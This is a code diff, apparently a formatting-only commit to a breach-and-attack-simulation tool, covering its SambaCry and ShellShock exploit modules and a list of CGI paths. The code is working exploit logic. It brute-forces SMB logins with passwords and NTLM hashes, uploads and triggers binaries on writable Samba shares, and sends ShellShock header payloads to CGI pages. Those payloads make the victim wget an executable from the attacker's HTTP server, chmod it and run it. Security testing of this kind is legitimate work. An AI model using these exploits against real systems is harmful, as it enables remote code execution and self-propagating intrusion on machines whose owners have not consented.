+                creds["username"],
+                creds["password"],
+                creds["lm_hash"],
+                creds["ntlm_hash"],
+            )
             if trigger_result is not None:
                 successfully_triggered_shares.append((share, trigger_result))
-                url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {'username': creds['username'],
-                                                                               'host': self.host.ip_addr,
-                                                                               'port': self.SAMBA_PORT,
-                                                                               'share_name': share}
+                url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {
+                    "username": creds["username"],
+                    "host": self.host.ip_addr,
+                    "port": self.SAMBA_PORT,
+                    "share_name": share,
+                }
                 self.add_vuln_url(url)
             self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])

@@ -97,8 +130,9 @@ class SambaCryExploiter(HostExploiter):

         if len(successfully_triggered_shares) > 0:
             LOG.info(
-                "Shares triggered successfully on host %s: %s" % (
-                    self.host.ip_addr, str(successfully_triggered_shares)))
+                "Shares triggered successfully on host %s: %s"
+                % (self.host.ip_addr, str(successfully_triggered_shares))
+            )
             self.add_vuln_port(self.SAMBA_PORT)
             return True
         else:

@@ -117,8 +151,9 @@ class SambaCryExploiter(HostExploiter):
             self.trigger_module(smb_client, share)
         except (impacket.smbconnection.SessionError, SessionError):
             LOG.debug(
-                "Exception trying to exploit host: %s, share: %s, with creds: %s." % (
-                    self.host.ip_addr, share, str(creds)))
+                "Exception trying to exploit host: %s, share: %s, with creds: %s."
+                % (self.host.ip_addr, share, str(creds))
+            )

     def clean_share(self, ip, share, creds):
         """

@@ -129,9 +164,14 @@ class SambaCryExploiter(HostExploiter):
         """
         smb_client = self.connect_to_server(ip, creds)
         tree_id = smb_client.connectTree(share)
-        file_list = [self.SAMBACRY_COMMANDLINE_FILENAME, self.SAMBACRY_RUNNER_RESULT_FILENAME,
-                     self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64,
-                     self.SAMBACRY_MONKEY_FILENAME_32, self.SAMBACRY_MONKEY_FILENAME_64]
+        file_list = [
+            self.SAMBACRY_COMMANDLINE_FILENAME,
+            self.SAMBACRY_RUNNER_RESULT_FILENAME,
+            self.SAMBACRY_RUNNER_FILENAME_32,
+            self.SAMBACRY_RUNNER_FILENAME_64,
+            self.SAMBACRY_MONKEY_FILENAME_32,
+            self.SAMBACRY_MONKEY_FILENAME_64,
+        ]

         for filename in file_list:
             try:

@@ -153,8 +193,9 @@ class SambaCryExploiter(HostExploiter):
         tree_id = smb_client.connectTree(share)
         file_content = None
         try:
-            file_id = smb_client.openFile(tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
-                                          desiredAccess=FILE_READ_DATA)
+            file_id = smb_client.openFile(
+                tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA
+            )
             file_content = smb_client.readFile(tree_id, file_id)
             smb_client.closeFile(tree_id, file_id)
         except (impacket.smbconnection.SessionError, SessionError):

@@ -193,16 +234,18 @@ class SambaCryExploiter(HostExploiter):
     def get_credentials_list(self):
         creds = self._config.get_exploit_user_password_or_hash_product()

-        creds = [{'username': user, 'password': password, 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash}
-                 for user, password, lm_hash, ntlm_hash in creds]
+        creds = [
+            {"username": user, "password": password, "lm_hash": lm_hash, "ntlm_hash": ntlm_hash}
+            for user, password, lm_hash, ntlm_hash in creds
+        ]

         # Add empty credentials for anonymous shares.
-        creds.insert(0, {'username': '', 'password': '', 'lm_hash': '', 'ntlm_hash': ''})
+        creds.insert(0, {"username": "", "password": "", "lm_hash": "", "ntlm_hash": ""})

         return creds

     def list_shares(self, smb_client):
-        shares = [x['shi1_netname'][:-1] for x in smb_client.listShares()]
+        shares = [x["shi1_netname"][:-1] for x in smb_client.listShares()]
         return [x for x in shares if x not in self._config.sambacry_shares_not_to_check]

     def is_vulnerable(self):

@@ -214,8 +257,8 @@ class SambaCryExploiter(HostExploiter):
             LOG.info("Host: %s doesn't have SMB open" % self.host.ip_addr)
             return False

-        pattern = re.compile(r'\d*\.\d*\.\d*')
-        smb_server_name = self.host.services[SMB_SERVICE].get('name')
+        pattern = re.compile(r"\d*\.\d*\.\d*")
+        smb_server_name = self.host.services[SMB_SERVICE].get("name")
         if not smb_server_name:
             LOG.info("Host: %s refused SMB connection" % self.host.ip_addr)
             return False

@@ -223,27 +266,38 @@ class SambaCryExploiter(HostExploiter):
         pattern_result = pattern.search(smb_server_name)
         is_vulnerable = False
         if pattern_result is not None:
-            samba_version = smb_server_name[pattern_result.start():pattern_result.end()]
-            samba_version_parts = samba_version.split('.')
+            samba_version = smb_server_name[pattern_result.start() : pattern_result.end()]
+            samba_version_parts = samba_version.split(".")
             if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"):
                 is_vulnerable = True
             elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"):
                 is_vulnerable = True
-            elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and (
-                    samba_version_parts[1] <= "13"):
+            elif (
+                (samba_version_parts[0] == "4")
+                and (samba_version_parts[1] == "4")
+                and (samba_version_parts[1] <= "13")
+            ):
                 is_vulnerable = True
-            elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and (
-                    samba_version_parts[1] <= "9"):
+            elif (
+                (samba_version_parts[0] == "4")
+                and (samba_version_parts[1] == "5")
+                and (samba_version_parts[1] <= "9")
+            ):
                 is_vulnerable = True
-            elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and (
-                    samba_version_parts[1] <= "3"):
+            elif (
+                (samba_version_parts[0] == "4")
+                and (samba_version_parts[1] == "6")
+                and (samba_version_parts[1] <= "3")
+            ):
                 is_vulnerable = True
         else:
            # If pattern doesn't match we can't tell what version it is. Better try
            is_vulnerable = True
|
||||||
|
|
||||||
LOG.info("Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s" %
|
LOG.info(
|
||||||
(self.host.ip_addr, smb_server_name, samba_version, repr(is_vulnerable)))
|
"Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s"
|
||||||
|
% (self.host.ip_addr, smb_server_name, samba_version, repr(is_vulnerable))
|
||||||
|
)
|
||||||
|
|
||||||
return is_vulnerable
|
return is_vulnerable
|
||||||
|
|
||||||
|
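A side note on the version check in the hunk above (an illustration, not a change black made): `samba_version_parts` holds strings, so the `<=` and `>=` comparisons are lexicographic rather than numeric. The following self-contained sketch, using a hypothetical version string, shows where that matters:

# Illustration only, not code from the commit. The Samba version check above
# compares version components as strings, so ordering is lexicographic.
parts = "4.13.2".split(".")   # hypothetical Samba version for demonstration
print(parts[1] <= "3")        # True: "13" sorts before "3" lexicographically
print(int(parts[1]) <= 3)     # False: 13 is greater than 3 numerically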
@@ -255,27 +309,41 @@ class SambaCryExploiter(HostExploiter):
         """
        tree_id = smb_client.connectTree(share)

-        with self.get_monkey_commandline_file(self._config.dropper_target_path_linux) as monkey_commandline_file:
-            smb_client.putFile(share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read)
+        with self.get_monkey_commandline_file(
+            self._config.dropper_target_path_linux
+        ) as monkey_commandline_file:
+            smb_client.putFile(
+                share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read
+            )

         with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
-            smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read)
+            smb_client.putFile(
+                share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read
+            )

         with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
-            smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read)
+            smb_client.putFile(
+                share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read
+            )

         monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
         monkey_bin_64_src_path = get_target_monkey_by_os(False, False)

         with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
-            smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read)
+            smb_client.putFile(
+                share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read
+            )

         with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
-            smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read)
-            T1105Telem(ScanStatus.USED,
-                       get_interface_to_target(self.host.ip_addr),
-                       self.host.ip_addr,
-                       monkey_bin_64_src_path).send()
+            smb_client.putFile(
+                share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read
+            )
+            T1105Telem(
+                ScanStatus.USED,
+                get_interface_to_target(self.host.ip_addr),
+                self.host.ip_addr,
+                monkey_bin_64_src_path,
+            ).send()
         smb_client.disconnectTree(tree_id)

     def trigger_module(self, smb_client, share):

@@ -305,7 +373,7 @@ class SambaCryExploiter(HostExploiter):
             self.open_pipe(smb_client, "/" + module_path)
         except Exception as e:
             # This is the expected result. We can't tell whether we succeeded or not just by this error code.
-            if str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
+            if str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
                 return True
             else:
                 pass

@@ -320,7 +388,10 @@ class SambaCryExploiter(HostExploiter):
         """
         sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess
         file_names = [self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64]
-        return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)]
+        return [
+            posixpath.join(*x)
+            for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)
+        ]

     def get_monkey_runner_bin_file(self, is_32bit):
         if is_32bit:

@@ -329,10 +400,12 @@ class SambaCryExploiter(HostExploiter):
         return open(get_binary_file_path(self.SAMBACRY_RUNNER_FILENAME_64), "rb")

     def get_monkey_commandline_file(self, location):
-        return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host,
-                                                              get_monkey_depth() - 1,
-                                                              SambaCryExploiter.SAMBA_PORT,
-                                                              str(location)))
+        return BytesIO(
+            DROPPER_ARG
+            + build_monkey_commandline(
+                self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location)
+            )
+        )

     @staticmethod
     def is_share_writable(smb_client, share):

@@ -342,14 +415,14 @@ class SambaCryExploiter(HostExploiter):
         :param share: share name
         :return: True if share is writable, False otherwise.
         """
-        LOG.debug('Checking %s for write access' % share)
+        LOG.debug("Checking %s for write access" % share)
         try:
             tree_id = smb_client.connectTree(share)
         except (impacket.smbconnection.SessionError, SessionError):
             return False

         try:
-            smb_client.openFile(tree_id, '\\', FILE_WRITE_DATA, creationOption=FILE_DIRECTORY_FILE)
+            smb_client.openFile(tree_id, "\\", FILE_WRITE_DATA, creationOption=FILE_DIRECTORY_FILE)
             writable = True
         except (impacket.smbconnection.SessionError, SessionError):
             writable = False

@@ -369,85 +442,103 @@ class SambaCryExploiter(HostExploiter):
         """
         smb_client = SMBConnection(ip, ip)
         smb_client.login(
-            credentials["username"], credentials["password"], '', credentials["lm_hash"], credentials["ntlm_hash"])
+            credentials["username"],
+            credentials["password"],
+            "",
+            credentials["lm_hash"],
+            credentials["ntlm_hash"],
+        )
         return smb_client

     # Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability #
     @staticmethod
-    def create_smb(smb_client, treeId, fileName, desiredAccess, shareMode, creationOptions, creationDisposition,
-                   fileAttributes, impersonationLevel=SMB2_IL_IMPERSONATION, securityFlags=0,
-                   oplockLevel=SMB2_OPLOCK_LEVEL_NONE, createContexts=None):
+    def create_smb(
+        smb_client,
+        treeId,
+        fileName,
+        desiredAccess,
+        shareMode,
+        creationOptions,
+        creationDisposition,
+        fileAttributes,
+        impersonationLevel=SMB2_IL_IMPERSONATION,
+        securityFlags=0,
+        oplockLevel=SMB2_OPLOCK_LEVEL_NONE,
+        createContexts=None,
+    ):

         packet = smb_client.getSMBServer().SMB_PACKET()
-        packet['Command'] = SMB2_CREATE
-        packet['TreeID'] = treeId
-        if smb_client._SMBConnection._Session['TreeConnectTable'][treeId]['IsDfsShare'] is True:
-            packet['Flags'] = SMB2_FLAGS_DFS_OPERATIONS
+        packet["Command"] = SMB2_CREATE
+        packet["TreeID"] = treeId
+        if smb_client._SMBConnection._Session["TreeConnectTable"][treeId]["IsDfsShare"] is True:
+            packet["Flags"] = SMB2_FLAGS_DFS_OPERATIONS

         smb2Create = SMB2Create()
-        smb2Create['SecurityFlags'] = 0
-        smb2Create['RequestedOplockLevel'] = oplockLevel
-        smb2Create['ImpersonationLevel'] = impersonationLevel
-        smb2Create['DesiredAccess'] = desiredAccess
-        smb2Create['FileAttributes'] = fileAttributes
-        smb2Create['ShareAccess'] = shareMode
-        smb2Create['CreateDisposition'] = creationDisposition
-        smb2Create['CreateOptions'] = creationOptions
+        smb2Create["SecurityFlags"] = 0
+        smb2Create["RequestedOplockLevel"] = oplockLevel
+        smb2Create["ImpersonationLevel"] = impersonationLevel
+        smb2Create["DesiredAccess"] = desiredAccess
+        smb2Create["FileAttributes"] = fileAttributes
+        smb2Create["ShareAccess"] = shareMode
+        smb2Create["CreateDisposition"] = creationDisposition
+        smb2Create["CreateOptions"] = creationOptions

-        smb2Create['NameLength'] = len(fileName) * 2
-        if fileName != '':
-            smb2Create['Buffer'] = fileName.encode('utf-16le')
+        smb2Create["NameLength"] = len(fileName) * 2
+        if fileName != "":
+            smb2Create["Buffer"] = fileName.encode("utf-16le")
         else:
-            smb2Create['Buffer'] = b'\x00'
+            smb2Create["Buffer"] = b"\x00"

         if createContexts is not None:
-            smb2Create['Buffer'] += createContexts
-            smb2Create['CreateContextsOffset'] = len(SMB2Packet()) + SMB2Create.SIZE + smb2Create['NameLength']
-            smb2Create['CreateContextsLength'] = len(createContexts)
+            smb2Create["Buffer"] += createContexts
+            smb2Create["CreateContextsOffset"] = (
+                len(SMB2Packet()) + SMB2Create.SIZE + smb2Create["NameLength"]
+            )
+            smb2Create["CreateContextsLength"] = len(createContexts)
         else:
-            smb2Create['CreateContextsOffset'] = 0
-            smb2Create['CreateContextsLength'] = 0
+            smb2Create["CreateContextsOffset"] = 0
+            smb2Create["CreateContextsLength"] = 0

-        packet['Data'] = smb2Create
+        packet["Data"] = smb2Create

         packetID = smb_client.getSMBServer().sendSMB(packet)
         ans = smb_client.getSMBServer().recvSMB(packetID)
         if ans.isValidAnswer(STATUS_SUCCESS):
-            createResponse = SMB2Create_Response(ans['Data'])
+            createResponse = SMB2Create_Response(ans["Data"])

             # The client MUST generate a handle for the Open, and it MUST
             # return success and the generated handle to the calling application.
             # In our case, str(FileID)
-            return str(createResponse['FileID'])
+            return str(createResponse["FileID"])

     @staticmethod
     def open_pipe(smb_client, pathName):
         # We need to overwrite Impacket's openFile functions since they automatically convert paths to NT style
         # to make things easier for the caller. Not this time ;)
-        treeId = smb_client.connectTree('IPC$')
-        LOG.debug('Triggering path: %s' % pathName)
+        treeId = smb_client.connectTree("IPC$")
+        LOG.debug("Triggering path: %s" % pathName)

         if smb_client.getDialect() == SMB_DIALECT:
             _, flags2 = smb_client.getSMBServer().get_flags()

-            pathName = pathName.encode('utf-16le') if flags2 & SMB.FLAGS2_UNICODE else pathName
+            pathName = pathName.encode("utf-16le") if flags2 & SMB.FLAGS2_UNICODE else pathName

             ntCreate = SMBCommand(SMB.SMB_COM_NT_CREATE_ANDX)
-            ntCreate['Parameters'] = SMBNtCreateAndX_Parameters()
-            ntCreate['Data'] = SMBNtCreateAndX_Data(flags=flags2)
-            ntCreate['Parameters']['FileNameLength'] = len(pathName)
-            ntCreate['Parameters']['AccessMask'] = FILE_READ_DATA
-            ntCreate['Parameters']['FileAttributes'] = 0
-            ntCreate['Parameters']['ShareAccess'] = FILE_SHARE_READ
-            ntCreate['Parameters']['Disposition'] = FILE_NON_DIRECTORY_FILE
-            ntCreate['Parameters']['CreateOptions'] = FILE_OPEN
-            ntCreate['Parameters']['Impersonation'] = SMB2_IL_IMPERSONATION
-            ntCreate['Parameters']['SecurityFlags'] = 0
-            ntCreate['Parameters']['CreateFlags'] = 0x16
-            ntCreate['Data']['FileName'] = pathName
+            ntCreate["Parameters"] = SMBNtCreateAndX_Parameters()
+            ntCreate["Data"] = SMBNtCreateAndX_Data(flags=flags2)
+            ntCreate["Parameters"]["FileNameLength"] = len(pathName)
+            ntCreate["Parameters"]["AccessMask"] = FILE_READ_DATA
+            ntCreate["Parameters"]["FileAttributes"] = 0
+            ntCreate["Parameters"]["ShareAccess"] = FILE_SHARE_READ
+            ntCreate["Parameters"]["Disposition"] = FILE_NON_DIRECTORY_FILE
+            ntCreate["Parameters"]["CreateOptions"] = FILE_OPEN
+            ntCreate["Parameters"]["Impersonation"] = SMB2_IL_IMPERSONATION
+            ntCreate["Parameters"]["SecurityFlags"] = 0
+            ntCreate["Parameters"]["CreateFlags"] = 0x16
+            ntCreate["Data"]["FileName"] = pathName

             if flags2 & SMB.FLAGS2_UNICODE:
-                ntCreate['Data']['Pad'] = 0x0
+                ntCreate["Data"]["Pad"] = 0x0

             return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)
         else:

@@ -459,4 +550,5 @@ class SambaCryExploiter(HostExploiter):
                 shareMode=FILE_SHARE_READ,
                 creationOptions=FILE_OPEN,
                 creationDisposition=FILE_NON_DIRECTORY_FILE,
-                fileAttributes=0)
+                fileAttributes=0,
+            )
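The hunks above can be reproduced mechanically. A minimal sketch, assuming black v20.8b1 and a 100-character line length (the exact invocation is not recorded in this diff; 100 is inferred from how the wrapped lines land):

# Minimal sketch, not part of the commit: reproduce the reformatting of one
# sambacry.py fragment through black's Python API. The line_length=100 is an
# assumption inferred from the wrapped lines in the hunks above.
import black

SOURCE = (
    "creds = [{'username': user, 'password': password, 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash}\n"
    "         for user, password, lm_hash, ntlm_hash in creds]\n"
)

# format_str() normalizes the quotes and explodes the comprehension,
# matching the get_credentials_list() hunk above.
print(black.format_str(SOURCE, mode=black.FileMode(line_length=100)))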
@@ -9,51 +9,58 @@ import requests
 from common.utils.attack_utils import ScanStatus
 from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.shellshock_resources import CGI_FILES
-from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey
+from infection_monkey.exploit.tools.helpers import (
+    build_monkey_commandline,
+    get_monkey_depth,
+    get_target_monkey,
+)
 from infection_monkey.exploit.tools.http_tools import HTTPTools
 from infection_monkey.model import DROPPER_ARG
 from infection_monkey.telemetry.attack.t1222_telem import T1222Telem

-__author__ = 'danielg'
+__author__ = "danielg"

 LOG = logging.getLogger(__name__)
 TIMEOUT = 2
-TEST_COMMAND = '/bin/uname -a'
+TEST_COMMAND = "/bin/uname -a"
 DOWNLOAD_TIMEOUT = 300  # copied from rdpgrinder
-LOCK_HELPER_FILE = '/tmp/monkey_shellshock'
+LOCK_HELPER_FILE = "/tmp/monkey_shellshock"


 class ShellShockExploiter(HostExploiter):
-    _attacks = {
-        "Content-type": "() { :;}; echo; "
-    }
+    _attacks = {"Content-type": "() { :;}; echo; "}

-    _TARGET_OS_TYPE = ['linux']
-    _EXPLOITED_SERVICE = 'Bash'
+    _TARGET_OS_TYPE = ["linux"]
+    _EXPLOITED_SERVICE = "Bash"

     def __init__(self, host):
         super(ShellShockExploiter, self).__init__(host)
         self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
-        self.success_flag = ''.join(
-            choice(string.ascii_uppercase + string.digits
-                   ) for _ in range(20))
+        self.success_flag = "".join(
+            choice(string.ascii_uppercase + string.digits) for _ in range(20)
+        )
         self.skip_exist = self._config.skip_exploit_if_file_exist

     def _exploit_host(self):
         # start by picking ports
         candidate_services = {
-            service: self.host.services[service] for service in self.host.services if
-            ('name' in self.host.services[service]) and (self.host.services[service]['name'] == 'http')
+            service: self.host.services[service]
+            for service in self.host.services
+            if ("name" in self.host.services[service])
+            and (self.host.services[service]["name"] == "http")
         }

-        valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in self.HTTP if
-                       'tcp-' + str(port) in candidate_services]
+        valid_ports = [
+            (port, candidate_services["tcp-" + str(port)]["data"][1])
+            for port in self.HTTP
+            if "tcp-" + str(port) in candidate_services
+        ]
         http_ports = [port[0] for port in valid_ports if not port[1]]
         https_ports = [port[0] for port in valid_ports if port[1]]

         LOG.info(
-            'Scanning %s, ports [%s] for vulnerable CGI pages' % (
-                self.host, ",".join([str(port[0]) for port in valid_ports]))
+            "Scanning %s, ports [%s] for vulnerable CGI pages"
+            % (self.host, ",".join([str(port[0]) for port in valid_ports]))
         )

         attackable_urls = []
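To make the reformatted candidate_services comprehension above concrete, here is a self-contained toy run; the service-table values are hypothetical, invented only for illustration:

# Toy illustration, not from the commit: what the black-formatted
# candidate_services comprehension selects from a host's service table.
services = {
    "tcp-80": {"name": "http", "data": (None, False)},   # plain HTTP
    "tcp-443": {"name": "http", "data": (None, True)},   # HTTPS
    "tcp-22": {"name": "ssh", "data": (None, False)},    # filtered out
}

candidate_services = {
    service: services[service]
    for service in services
    if ("name" in services[service]) and (services[service]["name"] == "http")
}

print(sorted(candidate_services))  # ['tcp-443', 'tcp-80']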
@@ -69,39 +76,45 @@ class ShellShockExploiter(HostExploiter):
         exploitable_urls = [url for url in exploitable_urls if url[0] is True]

         # we want to report all vulnerable URLs even if we didn't succeed
-        self.exploit_info['vulnerable_urls'] = [url[1] for url in exploitable_urls]
+        self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls]

         # now try URLs until we install something on victim
         for _, url, header, exploit in exploitable_urls:
             LOG.info("Trying to attack host %s with %s URL" % (self.host, url))
             # same attack script as sshexec
             # for any failure, quit and don't try other URLs
-            if not self.host.os.get('type'):
+            if not self.host.os.get("type"):
                 try:
-                    uname_os_attack = exploit + '/bin/uname -o'
+                    uname_os_attack = exploit + "/bin/uname -o"
                     uname_os = self.attack_page(url, header, uname_os_attack)
-                    if 'linux' in uname_os:
-                        self.host.os['type'] = 'linux'
+                    if "linux" in uname_os:
+                        self.host.os["type"] = "linux"
                     else:
                         LOG.info("SSH Skipping unknown os: %s", uname_os)
                         return False
                 except Exception as exc:
                     LOG.debug("Error running uname os command on victim %r: (%s)", self.host, exc)
                     return False
-            if not self.host.os.get('machine'):
+            if not self.host.os.get("machine"):
                 try:
-                    uname_machine_attack = exploit + '/bin/uname -m'
+                    uname_machine_attack = exploit + "/bin/uname -m"
                     uname_machine = self.attack_page(url, header, uname_machine_attack)
-                    if '' != uname_machine:
-                        self.host.os['machine'] = uname_machine.lower().strip()
+                    if "" != uname_machine:
+                        self.host.os["machine"] = uname_machine.lower().strip()
                 except Exception as exc:
-                    LOG.debug("Error running uname machine command on victim %r: (%s)", self.host, exc)
+                    LOG.debug(
+                        "Error running uname machine command on victim %r: (%s)", self.host, exc
+                    )
                     return False

             # copy the monkey
             dropper_target_path_linux = self._config.dropper_target_path_linux
-            if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
-                LOG.info("Host %s was already infected under the current configuration, done" % self.host)
+            if self.skip_exist and (
+                self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)
+            ):
+                LOG.info(
+                    "Host %s was already infected under the current configuration, done" % self.host
+                )
                 return True  # return already infected

             src_path = get_target_monkey(self.host)

@@ -119,12 +132,12 @@ class ShellShockExploiter(HostExploiter):
                 LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
                 return False

-            download_command = '/usr/bin/wget %s -O %s;' % (
-                http_path, dropper_target_path_linux)
+            download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux)

             download = exploit + download_command
-            self.attack_page(url, header,
-                             download)  # we ignore failures here since it might take more than TIMEOUT time
+            self.attack_page(
+                url, header, download
+            )  # we ignore failures here since it might take more than TIMEOUT time

             http_thread.join(DOWNLOAD_TIMEOUT)
             http_thread.stop()

@@ -132,30 +145,44 @@ class ShellShockExploiter(HostExploiter):
             self._remove_lock_file(exploit, url, header)

             if (http_thread.downloads != 1) or (
-                    'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
+                "ELF"
+                not in self.check_remote_file_exists(
+                    url, header, exploit, dropper_target_path_linux
+                )
+            ):
                 LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
                 continue

             # turn the monkey into an executable
-            chmod = '/bin/chmod +x %s' % dropper_target_path_linux
+            chmod = "/bin/chmod +x %s" % dropper_target_path_linux
             run_path = exploit + chmod
             self.attack_page(url, header, run_path)
             T1222Telem(ScanStatus.USED, chmod, self.host).send()

             # run the monkey
             cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
-            cmdline += build_monkey_commandline(self.host,
-                                                get_monkey_depth() - 1,
-                                                HTTPTools.get_port_from_url(url),
-                                                dropper_target_path_linux)
-            cmdline += ' & '
+            cmdline += build_monkey_commandline(
+                self.host,
+                get_monkey_depth() - 1,
+                HTTPTools.get_port_from_url(url),
+                dropper_target_path_linux,
+            )
+            cmdline += " & "
             run_path = exploit + cmdline
             self.attack_page(url, header, run_path)

-            LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
-                     self._config.dropper_target_path_linux, self.host, cmdline)
+            LOG.info(
+                "Executed monkey '%s' on remote victim %r (cmdline=%r)",
+                self._config.dropper_target_path_linux,
+                self.host,
+                cmdline,
+            )

-            if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)):
+            if not (
+                self.check_remote_file_exists(
+                    url, header, exploit, self._config.monkey_log_path_linux
+                )
+            ):
                 LOG.info("Log file does not exist, monkey might not have run")
                 continue
             self.add_executed_cmd(cmdline)

@@ -169,7 +196,7 @@ class ShellShockExploiter(HostExploiter):
         Checks if a remote file exists and returns the content if so
         file_path should be fully qualified
         """
-        cmdline = '/usr/bin/head -c 4 %s' % file_path
+        cmdline = "/usr/bin/head -c 4 %s" % file_path
         run_path = exploit + cmdline
         resp = cls.attack_page(url, header, run_path)
         if resp:

@@ -187,24 +214,24 @@ class ShellShockExploiter(HostExploiter):

         LOG.debug("Trying exploit for %s" % url)
         for header, exploit in list(attacks.items()):
-            attack = exploit + ' echo ' + self.success_flag + "; " + TEST_COMMAND
+            attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND
             result = self.attack_page(url, header, attack)
             if self.success_flag in result:
                 LOG.info("URL %s looks vulnerable" % url)
                 return True, url, header, exploit
             else:
                 LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
-        return False,
+        return (False,)

     def _create_lock_file(self, exploit, url, header):
         if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
             return False
-        cmd = exploit + 'echo AAAA > %s' % LOCK_HELPER_FILE
+        cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE
         self.attack_page(url, header, cmd)
         return True

     def _remove_lock_file(self, exploit, url, header):
-        cmd = exploit + 'rm %s' % LOCK_HELPER_FILE
+        cmd = exploit + "rm %s" % LOCK_HELPER_FILE
         self.attack_page(url, header, cmd)

     @staticmethod

@@ -213,7 +240,9 @@ class ShellShockExploiter(HostExploiter):
         try:
             LOG.debug("Header is: %s" % header)
             LOG.debug("Attack is: %s" % attack)
-            r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT)  # noqa: DUO123
+            r = requests.get(
+                url, headers={header: attack}, verify=False, timeout=TIMEOUT
+            )  # noqa: DUO123
             result = r.content.decode()
             return result
         except requests.exceptions.RequestException as exc:

@@ -226,9 +255,9 @@ class ShellShockExploiter(HostExploiter):
         Checks if which urls exist
         :return: Sequence of URLs to try and attack
         """
-        attack_path = 'http://'
+        attack_path = "http://"
         if is_https:
-            attack_path = 'https://'
+            attack_path = "https://"
         attack_path = attack_path + str(host) + ":" + str(port)
         reqs = []
         timeout = False

@@ -240,7 +269,9 @@ class ShellShockExploiter(HostExploiter):
             timeout = True
             break
         if timeout:
-            LOG.debug("Some connections timed out while sending request to potentially vulnerable urls.")
+            LOG.debug(
+                "Some connections timed out while sending request to potentially vulnerable urls."
+            )
         valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
         urls = [resp.url for resp in valid_resps]
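One change in the hunks above is behavior-preserving but easy to miss: `return False,` became `return (False,)`. Both return a one-element tuple; black only adds the parentheses that make the tuple visible. A quick self-contained check:

# Illustration only: "return False," and "return (False,)" are the same value;
# black's rewrite just makes the one-element tuple explicit.
def old_style():
    return False,

def new_style():
    return (False,)

assert old_style() == new_style() == (False,)
assert old_style()[0] is False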
@ -2,407 +2,407 @@
|
||||||
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
|
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
|
||||||
|
|
||||||
CGI_FILES = (
|
CGI_FILES = (
|
||||||
r'/',
|
r"/",
|
||||||
r'/admin.cgi',
|
r"/admin.cgi",
|
||||||
r'/administrator.cgi',
|
r"/administrator.cgi",
|
||||||
r'/agora.cgi',
|
r"/agora.cgi",
|
||||||
r'/aktivate/cgi-bin/catgy.cgi',
|
r"/aktivate/cgi-bin/catgy.cgi",
|
||||||
r'/analyse.cgi',
|
r"/analyse.cgi",
|
||||||
r'/apps/web/vs_diag.cgi',
|
r"/apps/web/vs_diag.cgi",
|
||||||
r'/axis-cgi/buffer/command.cgi',
|
r"/axis-cgi/buffer/command.cgi",
|
||||||
